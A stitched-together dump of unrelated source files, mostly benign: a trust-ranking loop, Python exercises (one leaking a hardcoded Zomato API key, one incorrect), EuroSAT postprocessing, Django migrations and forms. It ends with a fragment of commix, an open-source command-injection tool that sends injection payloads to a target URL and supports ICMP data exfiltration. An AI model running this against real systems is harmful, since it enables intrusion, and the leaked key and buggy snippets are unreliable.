value = "NA"
trust_ranking[node]=value
elif 0<= trust_value[node] <=10:
value = "Silver 1"
trust_ranking[node]=value
#node + "has Silver 1 ranking"
elif 11 < trust_value[node] <=18:
value = "Silver 2"
trust_ranking[node]=value
elif 19 < trust_value[node] <=32:
value = "Silver 3"
trust_ranking[node]=value
elif 33 < trust_value[node] <=40:
value = "Silver 4"
trust_ranking[node]=value
elif 41 < trust_value[node] <=52:
value = "Silver 5"
trust_ranking[node]=value
elif 53 < trust_value[node] <=60:
value = "Silver 6"
trust_ranking[node]=value
elif 61 <trust_value[node] <=75:
value = "Silver 7"
trust_ranking[node]=value
elif 76 < trust_value[node] <=82:
value = "Silver 8"
trust_ranking[node]=value
elif 83 < trust_value[node] <=99:
value = "Silver 9"
trust_ranking[node]=value
elif 100 <trust_value[node] <=120:
value = "Silver 10"
trust_ranking[node]=value
elif 121 < trust_value[node] <=180:
value = "Gold 1"
trust_ranking[node]=value
elif 181 < trust_value[node] <=300:
value = "Gold 2"
trust_ranking[node]=value
elif 301 < trust_value[node]:
value = "Gold 3"
trust_ranking[node]=value
#print (trust_values)
#blockMiner()
#print (trust_values)
#trustRanking(trust_values)
#print (trust_values)
def buildingTrust(): #infinite running and monitoring function which will keep track of ranks of nodes
while True:
blockMiner()
#print ("After Block")
#print (trust_values)
timeMeasure()
#print ("After Time")
#print (trust_values)
trustRanking(trust_values)
print (trust_ranking)
sleep(100)
buildingTrust()
"""
while True:
mine()
print (trust)
sleep(100)
#print (trust)
"""
|
993,528 | aa2429037a5d8feb8d8e452eb0cd47e1d54b3343 | import hashlib
h = hashlib.sha256()
h.update(b'Kim')
result = h.hexdigest()
print(result)
|
993,529 | 8f38d0eb94f9c937ac7f5dfb6ee28745c511f1f0 | class Solution:
def canCompleteCircuit(self, gas: List[int], cost: List[int]) -> int:
gasNo = 0
costNo = 0
total = 0
while gasNo < len(gas) and costNo < len(cost):
if cost[costNo] < gas[gasNo]:
total = gas[gasNo] - cost[costNo]
if total < 0:
return (-1)
gasNo += 1
costNo += 1
else :
total = total + gas[gasNo] + cost[costNo]
return total
|
993,530 | 4874ee64554acc5e5245cb1c548fa737395724cd | ############################# Latihan - Tugas 1
'''
Gunakan API dari Zomato
Selamat datang di Zomato Apps:
Silahkan pilih opsi :
1. Cari resto
2. Daily Menu
Opsi 1 :
Mencari Restoran di kota tertentu
Input:
- Masukkan Nama Kota : (error handling)
- Masukkan Jumlah Restoran yang akan ditampilkan : contoh berapa jumlah restoran 1/5/10/all
Outputnya :
- Nama Restoran : .....
- Establishment Name : .....
- Cuisine Name : .....
- Alamat : .....
- No. Telfon : ....
- Rating : ...(angka)...
- Review : ...(angka)...
# 1x run bisa banyak url yang kita get, coba2 get yang sesuai
Opsi 2 :
Daily Menu - Menu Harian Restor
Input :
- Masukkan nama Kota : (error handling)
- Masukkan nama Resto :
- Jumlah menu yang akan ditampilkan :
Outputnya :
Daily Menu di restoran xxxx adalah ....{Sesuai dengan jumlah menu yang ingin ditampilkan}
'''
# ==================================================================================================
import requests
# key = "953a7c1382d94a98c504ebe56665b0d2"
# cat = "/categories"
# city = "/cities"
# host = "https://developers.zomato.com/api/v2.1"
# head = {"user-key" : key}
# url = host + cat
# url2 = host + city
# data = requests.get(url, headers = head)
# data2 = requests.get(url2, headers = {"user-key" : "953a7c1382d94a98c504ebe56665b0d2"})
# output = data.json()
# print (output['categories'])
key = "953a7c1382d94a98c504ebe56665b0d2"
while True:
print ("======>Welocome to Zomato Apps<======")
print ('''What are you gonna do today ?
1. Find a Restaurant
2. Daily Menu
3. Exit''')
menu = input("Choose your apps (1/2/3) :")
if menu == '1':
print ("====FIND A RESTAURANT====")
while True:
try:
kota = str(input("Please input a city name :")).lower() # Meminta nama kota
jumlah = int(input("How many restaurants do you want to show : ")) # Meminta jumlah restoran yang akan dikeluarkan
### Find City
urlkota = f'https://developers.zomato.com/api/v2.1/cities?q={kota}&count=1' # API Cities
webkota = requests.get(urlkota, headers = {'user-key': key})
output_kota = webkota.json()
# print (output)
cityid = output_kota['location_suggestions'][0]['id'] # Get entity_id of city
# print (cityid)
### Find Restaurant
urlresto = f'https://developers.zomato.com/api/v2.1/search?entity_id={cityid}&entity_type=city&count={jumlah}' #API Search
webresto = requests.get(urlresto, headers = {'user-key': key})
output_resto = webresto.json()
jumlah_resto = len(output_resto['restaurants'])
if jumlah <1:
print ('Invalid show number')
else:
for i in range(jumlah_resto):
print ('=' * 30)
print (f'Nama :{output_resto["restaurants"][i]["restaurant"]["name"]}') # Name
print (f'Establishment :{output_resto["restaurants"][i]["restaurant"]["establishment"][0]}') # Establishment
print (f'Cuisine :{output_resto["restaurants"][i]["restaurant"]["cuisines"]}') # Cuisine
print (f'Address :{output_resto["restaurants"][i]["restaurant"]["location"]["address"]}') # Address
print (f'Phone :{output_resto["restaurants"][i]["restaurant"]["phone_numbers"]}') # Phone
print (f'Rating :{output_resto["restaurants"][i]["restaurant"]["user_rating"]["aggregate_rating"]}/5.0') # Rating
print (f'Total Review :{output_resto["restaurants"][i]["restaurant"]["all_reviews_count"]}') # Total review
print ('=' * 30)
print ('')
break
except:
print("\nInvalid city name or show number\n")
break
elif menu == '2':
print ("====DAILY MENU====")
while True:
try:
kota = str(input("Please input a city name :")).lower() # Meminta nama kota
restaurant = str(input("Input a restaurant name : ")) # Meminta nama restoran yang akan dikeluarkan
jumlah = int(input('How many menu do you want to show : ')) #Meminta banyaknya menu yang akan ditampilkan
### Find City
urlkota = f'https://developers.zomato.com/api/v2.1/cities?q={kota}' # API Cities
webkota = requests.get(urlkota, headers = {'user-key': key})
output_kota = webkota.json()
# print (output)
cityid = output_kota['location_suggestions'][0]['id'] # Get entity_id of city
# print (cityid)
### Find a Restaurant
urlsearch = f'https://developers.zomato.com/api/v2.1/search?entity_id={cityid}&entity_type=city&q={restaurant}' #API Search
websearch = requests.get(urlsearch, headers = {'user-key': key})
output_search = websearch.json()
res_id = output_search['restaurants'][0]['restaurant']['id'] # Get Res_id of restaurant
# print (res_id)
### Find Daily Menu
urlmenu = f'https://developers.zomato.com/api/v2.1/dailymenu?res_id={res_id}&count={jumlah}'
webmenu = requests.get(urlmenu, headers = {'user-key': key})
output_menu = webmenu.json()
# print (output_menu)
no_menu = output_menu['message']
# print (no_menu)
jumlah_menu = len(output_menu['daily_menus'][0]['daily_menu']['dishes'])
if jumlah < 1:
print ('Invalid show number')
else:
if output_menu['status'] == 'success':
for i in range(jumlah):
print(f"Menu {i+1}")
print(f"Dish name: {output_menu['daily_menus'][0]['daily_menu']['dishes'][i]['dish']['name']}")
break
else:
print ("No Daily Menu Available")
break
except:
print("\nInvalid city name or restaurant name\n")
break
elif menu == '3':
print("====EXIT====")
break
else:
print ("\nApp is not avalaible\n")
'''
############################# Latihan - Tugas 2
Pokemon
pokeapi.co
Pokemon Database :
inputnya :
- Masukkan nama pokemon : (error handling)
outputnya :
- Nama Pokemon : ....
- HP : ....
- Attack : ....
- Deffense : ...
- Speed : ....
- Type : ....
- Image : url image foto pokemon
- Ability Name : ....
1.
2.
3.
'''
# ==================================================================================================
# import requests
# while True:
# try:
# pokemon = str(input("Input Pokemon name : ")).lower()
# url = f'https://pokeapi.co/api/v2/pokemon/{pokemon}'
# web = requests.get(url)
# output = web.json()
# if pokemon.isdigit() == True:
# print ('Number is not allowed')
# else:
# name = (output['name']).title() # Nama
# attack = output['stats'][1]['base_stat'] # Attack
# defense = output['stats'][2]['base_stat'] # Defense
# speed = output['stats'][5]['base_stat'] # Speed
# image = output['sprites']['back_default'] # Image
# tipe = output['types']
# types= []
# for i in range (len (output['types'])):
# types.append(tipe[i]['type']['name'])
# # print (types)
# types1 = ('-').join(types)
# tipe_tipe = types1 # Type
# abilities = output['abilities']
# ability= []
# for i in range (len (output['abilities'])):
# ability.append(abilities[i]['ability']['name'])
# # print (ability)
# ability1 = ('-').join(ability)
# abilities_abilities = ability1 # Abilities
# print(f'''===> POKEMON DATABASE <===
# Name : {name}
# Attack : {attack}
# Defense : {defense}
# Speed : {speed}
# Types : {tipe_tipe}
# Image : {image}
# Abilities : {abilities_abilities}''')
# break
# except:
# print ('''====Ivalid Pokemon name====
# Please input a valid pokemon name!''')
# =================================================================================================== |
993,531 | 0d1b8e9a0de12372e36ae011b91ac19ca917763d | import re
import itertools
import numpy as np
#Python zip version
def count_doubles_zip(val):
total = 0
for c1, c2 in zip(val, val[1:]):
if c1 == c2:
total += 1
return total
#Python classic count
def count_doubles_classic(val):
total = 0
for i in range(len(val)-1):
if val[i] == val[i+1]:
total += 1
return total
#Python iter count
def count_doubles_iter(val):
total = 0
chars = iter(val)
c1 = next(chars)
for c2 in chars:
if c1 == c2:
total += 1
c1 == c2
return total
#Python itertools count
def count_doubles_itertools(val):
c1s, c2s = itertools.tee(val)
next(c2s, None)
total = 0
for c1, c2 in zip(c1s, c2s):
if c1 == c2:
total += 1
return total
#Python regexp version
double_re = re.compile(r'(?=(.)\1)')
def count_doubles_regexp(val):
return len(double_re.findall(val))
#Python numpy version
def count_doubles_numpy(val):
ng = np.frombuffer(bytearray(val, encoding='utf-8'), dtype=np.byte)
return np.sum(ng[:-1]==ng[1:])
#Python list comprehension version
def count_doubles_comprehension(val):
return sum(1 for c1, c2 in zip(val, val[1:]) if c1 == c2)
|
993,532 | 5dc2d487b6128e06ab9b58f79899014c8427b5ae | '''
Created on 12/12/2018
Modified on 26/02/2018
@author: Francesco Pugliese
'''
import pdb
class Postprocessing:
@staticmethod
def labels_to_eurosat_classes_converter(class_number):
if class_number == 0:
class_txt='Annual Crop'
elif class_number == 1:
class_txt='Forest'
elif class_number == 2:
class_txt='Herbaceous Vegetation'
elif class_number == 3:
class_txt='Highway'
elif class_number == 4:
class_txt='Industrial'
elif class_number == 5:
class_txt='Pasture'
elif class_number == 6:
class_txt='Permanent Crop'
elif class_number == 7:
class_txt='Residential'
elif class_number == 8:
class_txt='River'
elif class_number == 9:
class_txt='Sea Lake'
return class_txt
@staticmethod
def eurosat_labels_counting(coords_list, classes_list, language):
classes_array_list = []
# Count of predicted classes
raccolto_annuale = 0
foresta = 0
vegetazione_erbacea = 0
strada = 0
industriale = 0
pascolo = 0
coltura_permanente = 0
residenziale = 0
fiume = 0
lago = 0
# Draw split image in coords_list
for i in range(len(classes_list)):
if classes_list[i]== [0]:
class_txt='raccolto annuale'
raccolto_annuale +=1
colors_boxes = 'khaki'
elif classes_list[i]== [1]:
class_txt='foresta'
foresta += 1
colors_boxes = 'green'
elif classes_list[i]== [2]:
class_txt='vegetazione erbacea'
vegetazione_erbacea += 1
colors_boxes = 'yellowgreen'
elif classes_list[i]== [3]:
class_txt='strada'
strada += 1
colors_boxes = 'grey'
elif classes_list[i]== [4]:
class_txt='industriale'
industriale += 1
colors_boxes = 'peru'
elif classes_list[i]== [5]:
class_txt='pascolo'
pascolo += 1
colors_boxes = 'whitesmoke'
elif classes_list[i]== [6]:
class_txt='coltura permanente'
coltura_permanente += 1
colors_boxes = 'mediumseagreen'
elif classes_list[i]== [7]:
class_txt='residenziale'
residenziale += 1
colors_boxes = 'beige'
elif classes_list[i]== [8]:
class_txt='fiume'
fiume += 1
colors_boxes = 'aqua'
elif classes_list[i]== [9]:
class_txt='lago'
lago += 1
colors_boxes = 'cyan'
classes_array_list.append([coords_list[i][0],coords_list[i][2],coords_list[i][1],coords_list[i][3],class_txt])
#print("\n%i, %i, %i, %i, %s " % (coords_list[i][0],coords_list[i][2],coords_list[i][1],coords_list[i][3],class_txt))
'''
# display the predictions to our screen
if coords_list[i][0] > coords_list[i-1][0]:
#print("\n(%i, %i) - (%i, %i) : %s , %s" % (coords_list[i][0],coords_list[i][2],coords_list[i][1],coords_list[i][3],class_txt, colors_boxes))
#print("\n%i %i %s %s" % (coords_list[i][2],coords_list[i][0], class_txt))
else:
#print("(%i, %i) - (%i, %i) : %s , %s" % (coords_list[i][0],coords_list[i][2],coords_list[i][1],coords_list[i][3],class_txt, colors_boxes))
print("%i %i %s %s" % (coords_list[i][2],coords_list[i][0], class_txt))
'''
countings = [raccolto_annuale, foresta, vegetazione_erbacea, strada, industriale, pascolo, coltura_permanente, residenziale, fiume, lago]
return [classes_array_list, countings]
@staticmethod
def lucas_labels_counting(coords_list, classes_list, language):
classes_array_list = []
# Count predicted classes
crop_land = 0
wood_land = 0
grass_land = 0
artificial_land = 0
water_areas = 0
# Draw split image in coords_list
for i in range(len(classes_list)):
if classes_list[i]== [0]:
class_txt='Crop Land'
crop_land +=1
colors_boxes = 'khaki'
elif classes_list[i]== [1]:
class_txt='Wood Land'
wood_land += 1
colors_boxes = 'green'
elif classes_list[i]== [2]:
class_txt='Grass Land'
grass_land += 1
colors_boxes = 'yellowgreen'
elif classes_list[i]== [3]:
class_txt='Artificial Land'
artificial_land += 1
colors_boxes = 'grey'
elif classes_list[i]== [4]:
class_txt='Aritificial Land'
artificial_land += 1
colors_boxes = 'grey'
elif classes_list[i]== [5]:
class_txt='Crop Land'
crop_land += 1
colors_boxes = 'khaki'
elif classes_list[i]== [6]:
class_txt='Crop Land'
crop_land += 1
colors_boxes = 'khaki'
elif classes_list[i]== [7]:
class_txt='Artificial Land'
artificial_land += 1
colors_boxes = 'grey'
elif classes_list[i]== [8]:
class_txt='Water Areas'
water_areas += 1
colors_boxes = 'aqua'
elif classes_list[i]== [9]:
class_txt='Water Areas'
water_areas += 1
colors_boxes = 'aqua'
classes_array_list.append([coords_list[i][0],coords_list[i][2],coords_list[i][1],coords_list[i][3],class_txt])
#print("\n%i, %i, %i, %i, %s " % (coords_list[i][0],coords_list[i][2],coords_list[i][1],coords_list[i][3],class_txt))
'''
# display the predictions to our screen
if coords_list[i][0] > coords_list[i-1][0]:
#print("\n(%i, %i) - (%i, %i) : %s , %s" % (coords_list[i][0],coords_list[i][2],coords_list[i][1],coords_list[i][3],class_txt, colors_boxes))
#print("\n%i %i %s %s" % (coords_list[i][2],coords_list[i][0], class_txt))
else:
#print("(%i, %i) - (%i, %i) : %s , %s" % (coords_list[i][0],coords_list[i][2],coords_list[i][1],coords_list[i][3],class_txt, colors_boxes))
print("%i %i %s %s" % (coords_list[i][2],coords_list[i][0], class_txt))
'''
countings = [crop_land, wood_land, grass_land, artificial_land, water_areas]
return [classes_array_list, countings]
@staticmethod
def eurosat_statistics_compute(countings, coords_list, language):
# Inizialize arrays of the statistics
fracs = []
labels = []
explode = []
colors = []
if countings[0] != 0:
rac = (countings[0]/len(coords_list))*100
print('raccolto annuale:',rac,'%')
fracs.append(rac)
labels.append('raccolto annuale')
explode.append(0.1)
colors.append('khaki')
if countings[1] != 0:
fore = (countings[1]/len(coords_list))*100
print('foresta:',fore,'%')
fracs.append(fore)
labels.append('foresta')
explode.append(0.1)
colors.append('green')
if countings[2] != 0:
veg = (countings[2]/len(coords_list))*100
print('vegetazione erbacea:',veg,'%')
fracs.append(veg)
labels.append('veg. erbacea')
explode.append(0.1)
colors.append('yellowgreen')
if countings[3] != 0:
strada = (countings[3]/len(coords_list))*100
print('strada:',strada,'%')
fracs.append(strada)
labels.append('strada')
explode.append(0.1)
colors.append('grey')
if countings[4] != 0:
ind = (countings[4]/len(coords_list))*100
print('industriale:' ,ind,'%')
fracs.append(ind)
labels.append('industriale')
explode.append(0.1)
colors.append('peru')
if countings[5] != 0:
pas = (countings[5]/len(coords_list))*100
print('pascolo:',pas,'%')
fracs.append(pas)
labels.append('pascolo')
explode.append(0.1)
colors.append('whitesmoke')
if countings[6] != 0:
col = (countings[6]/len(coords_list))*100
print('coltura permanente:',col,'%')
fracs.append(col)
labels.append('coltura permanente')
explode.append(0.1)
colors.append('mediumseagreen')
if countings[7] != 0:
res = (countings[7]/len(coords_list))*100
print('residenziale:',res,'%')
fracs.append(res)
labels.append('residenziale')
explode.append(0.1)
colors.append('beige')
if countings[8] != 0:
fiu = (countings[8]/len(coords_list))*100
print('fiume:',fiu,'%')
fracs.append(fiu)
labels.append('fiume')
explode.append(0.1)
colors.append('aqua')
if countings[9] != 0:
la = (countings[9]/len(coords_list))*100
print('lago:',la,'%')
fracs.append(la)
labels.append('lago')
explode.append(0.1)
colors.append('cyan')
return [fracs, labels, explode, colors]
@staticmethod
def lucas_statistics_compute(countings, coords_list, language):
# Inizialize arrays of the statistics
fracs = []
labels = []
explode = []
colors = []
if countings[0] != 0: # Crop Land
crop = (countings[0]/len(coords_list))*100
print('Cropland:',crop,'%')
fracs.append(crop)
labels.append('Cropland')
explode.append(0.1)
colors.append('khaki')
if countings[1] != 0: # Wood Land
wood = (countings[1]/len(coords_list))*100
print('Woodland:',wood,'%')
fracs.append(wood)
labels.append('Woodland')
explode.append(0.1)
colors.append('green')
if countings[2] != 0: # Grass Land
grass = (countings[2]/len(coords_list))*100
print('Grassland:',grass,'%')
fracs.append(grass)
labels.append('Grassland')
explode.append(0.1)
colors.append('yellowgreen')
if countings[3] != 0: # Artificial Land
art = (countings[3]/len(coords_list))*100
print('Artificial Land:',art,'%')
fracs.append(art)
labels.append('Artificial Land')
explode.append(0.1)
colors.append('grey')
if countings[4] != 0: # Water Areas
water = (countings[4]/len(coords_list))*100
print('Water Areas:' ,water,'%')
fracs.append(water)
labels.append('Water Areas')
explode.append(0.1)
colors.append('aqua')
return [fracs, labels, explode, colors]
@staticmethod
def get_plot_classes_title(parameters):
if parameters.classification_type == "EuroSAT":
classes_title = "EuroSat Classification \n\n"
ground_truth_title = "EuroSAT Classification n\n Ground Truth"
elif parameters.classification_type == "Lucas":
classes_title = "Lucas Classification \n\n"
ground_truth_title = "Lucas Classification \n\n Ground Truth"
if parameters.quantization == True:
quantization_title = classes_title + "Quantification by different samplings"
else:
quantization_title = None
if parameters.rotate_tiles == True:
rotation = "On"
else:
rotation = "Off"
classes_title = classes_title + " Stride: "+parameters.stride.__str__()+", Rotation: "+rotation
if parameters.rotate_tiles == True:
classes_title = classes_title + ", Rotation type: "
if parameters.random_rotations == True:
classes_title = classes_title + "Random"
else:
classes_title = classes_title + "180"
return [classes_title, ground_truth_title, quantization_title]
|
993,533 | 175c562a819b3fbee1727f3da1d012775992659d | /home/mi/besahre/Documents/Bachelorarbeit/Modelcar-111/catkin_ws_user/devel/.private/line_detection_fu/lib/python2.7/dist-packages/line_detection_fu/__init__.py |
993,534 | 84c930b962e2548d9a975609c250c17bc835d3d6 | # Generated by Django 2.0.3 on 2018-03-25 02:17
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='checkout',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('item', models.CharField(max_length=50)),
('total', models.DecimalField(decimal_places=2, max_digits=5)),
],
),
migrations.CreateModel(
name='chef',
fields=[
('chef_id', models.AutoField(primary_key=True, serialize=False)),
('menu_name', models.CharField(max_length=10)),
('warning', models.IntegerField()),
],
),
migrations.CreateModel(
name='complaints',
fields=[
('comp_id', models.AutoField(primary_key=True, serialize=False)),
('complaint_text', models.CharField(max_length=1000)),
('approval', models.BooleanField()),
],
),
migrations.CreateModel(
name='compliments',
fields=[
('comp_id', models.AutoField(primary_key=True, serialize=False)),
('compliment_text', models.CharField(max_length=1000)),
('approval', models.BooleanField()),
],
),
migrations.CreateModel(
name='customer',
fields=[
('user_id', models.CharField(max_length=60, primary_key=True, serialize=False)),
('password', models.CharField(max_length=25)),
('user_fname', models.CharField(max_length=25)),
('user_lname', models.CharField(max_length=25)),
('address', models.CharField(max_length=30)),
('city', models.CharField(max_length=10)),
('state', models.CharField(max_length=5)),
('zipcode', models.CharField(max_length=5)),
('phone', models.CharField(max_length=10)),
('birthday', models.DateField()),
('memb_since', models.DateTimeField()),
('wallet', models.DecimalField(decimal_places=2, max_digits=5)),
('VIP', models.BooleanField()),
('warning', models.IntegerField()),
('order_count', models.IntegerField()),
('num_complaints', models.IntegerField()),
('last_order', models.DateTimeField()),
],
),
migrations.CreateModel(
name='customer_review',
fields=[
('review_id', models.AutoField(primary_key=True, serialize=False)),
('pizza_rating', models.IntegerField()),
('store_rating', models.IntegerField()),
('delivery_rating', models.IntegerField()),
],
),
migrations.CreateModel(
name='delivery',
fields=[
('deliver_id', models.AutoField(primary_key=True, serialize=False)),
('status', models.BooleanField()),
('warning', models.IntegerField()),
],
),
migrations.CreateModel(
name='delivery_review',
fields=[
('review_id', models.AutoField(primary_key=True, serialize=False)),
('customer_rating', models.CharField(max_length=100)),
],
),
migrations.CreateModel(
name='employees',
fields=[
('emp_id', models.AutoField(primary_key=True, serialize=False)),
('password', models.CharField(max_length=25)),
('emp_fname', models.CharField(max_length=25)),
('emp_lname', models.CharField(max_length=25)),
('address', models.CharField(max_length=30)),
('city', models.CharField(max_length=10)),
('state', models.CharField(max_length=5)),
('zipcode', models.CharField(max_length=5)),
('phone', models.CharField(max_length=10)),
('ssn', models.CharField(max_length=9)),
('birthday', models.DateField()),
('salary', models.DecimalField(decimal_places=2, max_digits=5)),
('date_hired', models.DateTimeField()),
('num_compliment', models.IntegerField()),
('num_complaint', models.IntegerField()),
('last_order', models.DateTimeField()),
],
),
migrations.CreateModel(
name='menu',
fields=[
('menu_id', models.AutoField(primary_key=True, serialize=False)),
('price', models.DecimalField(decimal_places=2, max_digits=5)),
('description', models.CharField(max_length=100)),
('rating', models.IntegerField()),
('picture', models.CharField(max_length=1000)),
('chef_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.chef')),
],
),
migrations.CreateModel(
name='order',
fields=[
('order_id', models.AutoField(primary_key=True, serialize=False)),
('total', models.IntegerField()),
('menu_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.menu')),
],
),
migrations.CreateModel(
name='restaurant',
fields=[
('rest_id', models.AutoField(primary_key=True, serialize=False)),
('name', models.CharField(max_length=40)),
('address', models.CharField(max_length=30)),
('city', models.CharField(max_length=10)),
('state', models.CharField(max_length=5)),
('zipcode', models.CharField(max_length=5)),
('phone', models.CharField(max_length=10)),
],
),
migrations.AddField(
model_name='order',
name='rest_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.restaurant'),
),
migrations.AddField(
model_name='delivery_review',
name='emp_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
),
migrations.AddField(
model_name='delivery_review',
name='user_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
),
migrations.AddField(
model_name='delivery',
name='emp_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
),
migrations.AddField(
model_name='delivery',
name='store',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.restaurant'),
),
migrations.AddField(
model_name='customer_review',
name='emp_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
),
migrations.AddField(
model_name='customer_review',
name='order_number',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.order'),
),
migrations.AddField(
model_name='customer_review',
name='user_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
),
migrations.AddField(
model_name='compliments',
name='emp_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
),
migrations.AddField(
model_name='compliments',
name='user_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
),
migrations.AddField(
model_name='complaints',
name='emp_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
),
migrations.AddField(
model_name='complaints',
name='user_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
),
migrations.AddField(
model_name='chef',
name='emp_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.employees'),
),
migrations.AddField(
model_name='chef',
name='store',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.restaurant'),
),
migrations.AddField(
model_name='checkout',
name='user_id',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='tables.customer'),
),
]
|
993,535 | 151b22c171895f2b4c0700b57a174f9ee95337b3 | from .models import BookingDate, BookingWorkplace
from django.forms import ModelForm, DateInput, Select, DateField, IntegerField, Form, ChoiceField, SelectDateWidget
from .data import default_choices
from django.contrib.admin.widgets import AdminDateWidget
from django.forms.widgets import NumberInput
from bootstrap_datepicker_plus import DatePickerInput
class BookingDateForm(ModelForm):
class Meta:
model = BookingDate
fields = ['booking_date']
widgets = {
'booking_date' : SelectDateWidget()
}
class BookingTimeForm(ModelForm):
def __init__(self, *args, **kwargs):
start_choices = kwargs.pop('start_choices')
end_choices = kwargs.pop('end_choices')
cabinet = kwargs.pop('cabinet')
workplace = kwargs.pop('workplace')
booking_date = kwargs.pop('booking_date')
user = kwargs.pop('user')
super(BookingTimeForm, self).__init__(*args, **kwargs)
self.fields['start_time'].choices = start_choices
self.fields['end_time'].choices = end_choices
class Meta:
model = BookingWorkplace
fields = ['start_time', 'end_time']
widgets = {
'start_time' : Select(attrs={
'class' : 'form-select',
'aria-label' : "Default select example",
}),
'end_time' : Select(attrs={
'class' : 'form-select',
'aria-label' : "Default select example",
}),
}
class FreeWorkplaceForm(Form):
booking_date = DateField(label='Дата', widget=SelectDateWidget())
start_time = ChoiceField(label='Начало работы', choices=default_choices)
end_time = ChoiceField(label='Конец работы', choices=default_choices)
class Meta:
fields = ['booking_date', 'start_time', 'end_time']
widgets = {
'start_time' : Select(attrs={
'class' : 'form-control',
'verbose_name' : 'Начало'
}),
'end_time' : Select(attrs={
'class' : 'form-control',
}),
}
|
993,536 | 224b7a21fce7b3cd1e13fbea019afb16a0774460 | #!/usr/bin/env python
# encoding: UTF-8
"""
This file is part of commix (@commixproject) tool.
Copyright (c) 2015 Anastasios Stasinopoulos (@ancst).
https://github.com/stasinopoulos/commix
This program is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation,either version 3 of the License,or
(at your option) any later version.
For more see the file 'readme/COPYING' for copying permission.
"""
import re
import os
import sys
import time
import string
import random
import base64
import urllib
import urllib2
from src.utils import menu
from src.utils import colors
from src.utils import settings
from src.core.requests import headers
from src.core.requests import parameters
from src.core.injections.results_based.techniques.classic import cb_injector
from src.core.injections.results_based.techniques.classic import cb_payloads
from src.core.injections.results_based.techniques.classic import cb_enumeration
"""
The "classic" technique on Result-based OS Command Injection.
"""
#-------------------------------------------------------
# The "icmp exfiltration" injection technique handler.
#-------------------------------------------------------
def icmp_exfiltration_handler(url,http_request_method):
# You need to have root privileges to run this script
if os.geteuid() != 0:
print colors.BGRED + "\n(x) Error: You need to have root privileges to run this option.\n" + colors.RESET
sys.exit(0)
if http_request_method == "GET":
# Check if its not specified the 'INJECT_HERE' tag
url = parameters.do_GET_check(url)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_GET_param(url)
request_data = vuln_parameter
else:
parameter = menu.options.data
parameter = urllib2.unquote(parameter)
# Check if its not specified the 'INJECT_HERE' tag
parameter = parameters.do_POST_check(parameter)
# Define the vulnerable parameter
vuln_parameter = parameters.vuln_POST_param(parameter,url)
request_data = vuln_parameter
ip_data = menu.options.ip_icmp_data
# Load the module ICMP_Exfiltration
try:
from src.core.modules import ICMP_Exfiltration
except ImportError as e:
print colors.BGRED + "(x) Error:",e
print colors.RESET
sys.exit(1)
technique = "ICMP exfiltration technique"
sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... \n" + colors.RESET)
sys.stdout.flush()
ip_src = re.findall(r"ip_src=(.*),",ip_data)
ip_src = ''.join(ip_src)
ip_dst = re.findall(r"ip_dst=(.*)",ip_data)
ip_dst = ''.join(ip_dst)
ICMP_Exfiltration.exploitation(ip_dst,ip_src,url,http_request_method,request_data)
#---------------------------------------------
# The "classic" injection technique handler.
#---------------------------------------------
def cb_injection_handler(url,delay,filename,http_request_method):
counter = 0
vp_flag = True
no_result = True
is_encoded= False
injection_type = "Results-based Command Injection"
technique = "classic injection technique"
sys.stdout.write( colors.BOLD + "(*) Testing the "+ technique + "... " + colors.RESET)
sys.stdout.flush()
# Print the findings to log file.
output_file = open(filename + ".txt","a")
output_file.write("\n---")
output_file.write("\n(+) Type : " + injection_type)
output_file.write("\n(+) Technique : " + technique.title())
output_file.close()
for whitespace in settings.WHITESPACES:
for prefix in settings.PREFIXES:
for suffix in settings.SUFFIXES:
for separator in settings.SEPARATORS:
# Check for bad combination of prefix and separator
combination = prefix + separator
if combination in settings.JUNK_COMBINATION:
prefix = ""
# Change TAG on every request to prevent false-positive resutls.
TAG = ''.join(random.choice(string.ascii_uppercase) for i in range(6))
# Check if defined "--base64" option.
if menu.options.base64_trick == True:
B64_ENC_TAG = base64.b64encode(TAG)
B64_DEC_TRICK = settings.B64_DEC_TRICK
else:
B64_ENC_TAG = TAG
B64_DEC_TRICK = ""
try:
# Classic decision payload (check if host is vulnerable).
payload = cb_payloads.decision(separator,TAG,B64_ENC_TAG,B64_DEC_TRICK)
# Check if defined "--prefix" option.
if menu.options.prefix:
prefix = menu.options.prefix
payload = prefix + payload
else:
payload = prefix + payload
# Check if defined "--suffix" option.
if menu.options.suffix:
suffix = menu.options.suffix
payload = payload + suffix
else:
payload = payload + suffix
if separator == " " :
payload = re.sub(" ","%20",payload)
else:
payload = re.sub(" ",whitespace,payload)
# Check if defined "--verbose" option.
if menu.options.verbose:
sys.stdout.write("\n" + colors.GREY + payload + colors.RESET)
# Check if target host is vulnerable.
response,vuln_parameter = cb_injector.injection_test(payload,http_request_method,url)
# if need page reload
if menu.options.url_reload:
time.sleep(delay)
response = urllib.urlopen(url)
# Evaluate test results.
shell = cb_injector.injection_test_results(response,TAG)
except:
continue
# Yaw, got shellz!
# Do some magic tricks!
